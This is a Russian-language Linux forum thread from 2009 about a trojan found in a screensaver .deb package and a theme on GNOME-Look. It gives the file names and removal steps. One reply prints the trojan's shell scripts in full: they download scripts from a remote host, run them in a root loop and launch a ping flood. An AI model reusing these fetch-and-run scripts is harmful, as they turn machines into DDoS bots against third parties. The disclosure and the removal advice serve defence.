Lipetsk *nix Association Forum Lipetsk *nix Association Forum
Новости:
 
*
Добро пожаловать, Гость. Пожалуйста, войдите или зарегистрируйтесь.
Вам не пришло письмо с кодом активации?
18 Декабря 2024, 05:21:20


Войти


Страниц: [1]   Вниз
  Печать  
Автор Тема: В каталоге GNOME-Look зафиксировано наличие вредоносного ПО  (Прочитано 15564 раз)
0 Пользователей и 3 Гостей смотрят эту тему.
NeO
Злобный админчик
Администратор
*****

Карма: 62
Сообщений: 2376

Debian Stretch

ОС:
Linux Linux
Браузер:
Firefox 3.5.5 Firefox 3.5.5


WWW Награды
« : 10 Декабря 2009, 13:04:28 »

В deb-пакете с хранителем экрана waterfall, распространяемом через известный каталог GNOME-приложений GNOME-Look, зафиксировано наличие скрытой вредоносной вставки. После установки данного пакета в систему интегрируется специальный набор скриптов, предназначенный для подключения машины к проведению DDoS атак. Скрипт поддерживает удаленное получение заданий и способен самостоятельно обновить себя до более новой версии. Логика работы вредоносного ПО сводится к периодической загрузке и обычного shell скрипта, который затем запускается с правами root и выполняет, например, "ping -s 65507 хост".

Кроме того, подобный вредоносный код удалось обнаружить и в пакете с визуальной темой Ninja Black. Пользователям рекомендуется избегать установки сторонних пакетов, даже если они распространяются через известные ресурсы и по описанию содержат только мультимедиа данные.

При установке троянского пакета в системе появляются файлы /usr/bin/Auto.bash, /usr/bin/run.bash, /etc/profile.d/gnome.sh и index.php. Для излечения достаточно найти и удалить эти файлы, а также удалить пакет app5552 (sudo dpkg -r app5552).

http://www.opennet.ru/opennews/art.shtml?num=24610
Записан
RemDerBauer
Rebuild world
Глобальный модератор
*****

Карма: 14
Сообщений: 1886


Ubuntu forever

ОС:
Windows XP Windows XP
Браузер:
Opera 9.80 Opera 9.80


Награды
« Ответ #1 : 10 Декабря 2009, 14:48:27 »

началось?
Записан

Мы говорим Linux, подразумеваем Ubuntu......
NeO
Злобный админчик
Администратор
*****

Карма: 62
Сообщений: 2376

Debian Stretch

ОС:
Linux Linux
Браузер:
Firefox 3.5.5 Firefox 3.5.5


WWW Награды
« Ответ #2 : 10 Декабря 2009, 16:31:22 »

Угу. Линуксокапец близок (:
Записан
ALOPEX
Юзверь
**

Карма: 0
Сообщений: 98


чтобы вы обо мне не думали, вы ошибаетесь...

ОС:
Linux (Ubuntu) Linux (Ubuntu)
Браузер:
Firefox 3.0.15 Firefox 3.0.15


WWW Награды
« Ответ #3 : 10 Декабря 2009, 17:10:04 »

скрипт:
   #!/bin/sh
cd /usr/bin/
rm Auto.bash
sleep 1
wget http://05748.t35.com/Bots/Auto.bash
chmod 777 Auto.bash
echo -----------------
cd /etc/profile.d/
rm gnome.sh
sleep 1
wget http://05748.t35.com/Bots/gnome.sh
chmod 777 gnome.sh
echo -----------------
clear
exit


содержание скрипта Auto.bash

   while :
do
rm /usr/bin/run.bash
cd /usr/bin/
wget http://05748.t35.com/Bots/index.php
wget http://05748.t35.com/Bots/run.bash
sleep 4
rm index.php
chmod 755 run.bash
command -p /usr/bin/run.bash
done
видимо таким незатейливым способом автор сего безобразия планировал управлять бот-сетью )
в конечном итоге выполнялась команда:
ping -s 65507 www.mmowned.com
ну очень страшный скрипт , он превратит вашего пингвина в зомби,
« Последнее редактирование: 10 Декабря 2009, 17:12:24 от strannik » Записан

чтобы вы обо мне не думали, вы ошибаетесь...
NeO
Злобный админчик
Администратор
*****

Карма: 62
Сообщений: 2376

Debian Stretch

ОС:
Linux Linux
Браузер:
Firefox 3.5.5 Firefox 3.5.5


WWW Награды
« Ответ #4 : 10 Декабря 2009, 19:31:39 »

Осталось найти того, кто  это туда залил и посадить на 10 лет за Windows 95 (:
Записан
RemDerBauer
Rebuild world
Глобальный модератор
*****

Карма: 14
Сообщений: 1886


Ubuntu forever

ОС:
Linux Linux
Браузер:
Opera 9.80 Opera 9.80


Награды
« Ответ #5 : 10 Декабря 2009, 22:49:19 »

и посадить на кол //исправлено
Записан

Мы говорим Linux, подразумеваем Ubuntu......
Страниц: [1]   Вверх
  Печать  
 
Перейти в:  

Powered by MySQL Powered by PHP Powered by SMF 1.1.21 | SMF © 2011, Simple Machines

Valid XHTML 1.0! Valid CSS! Dilber MC Theme by HarzeM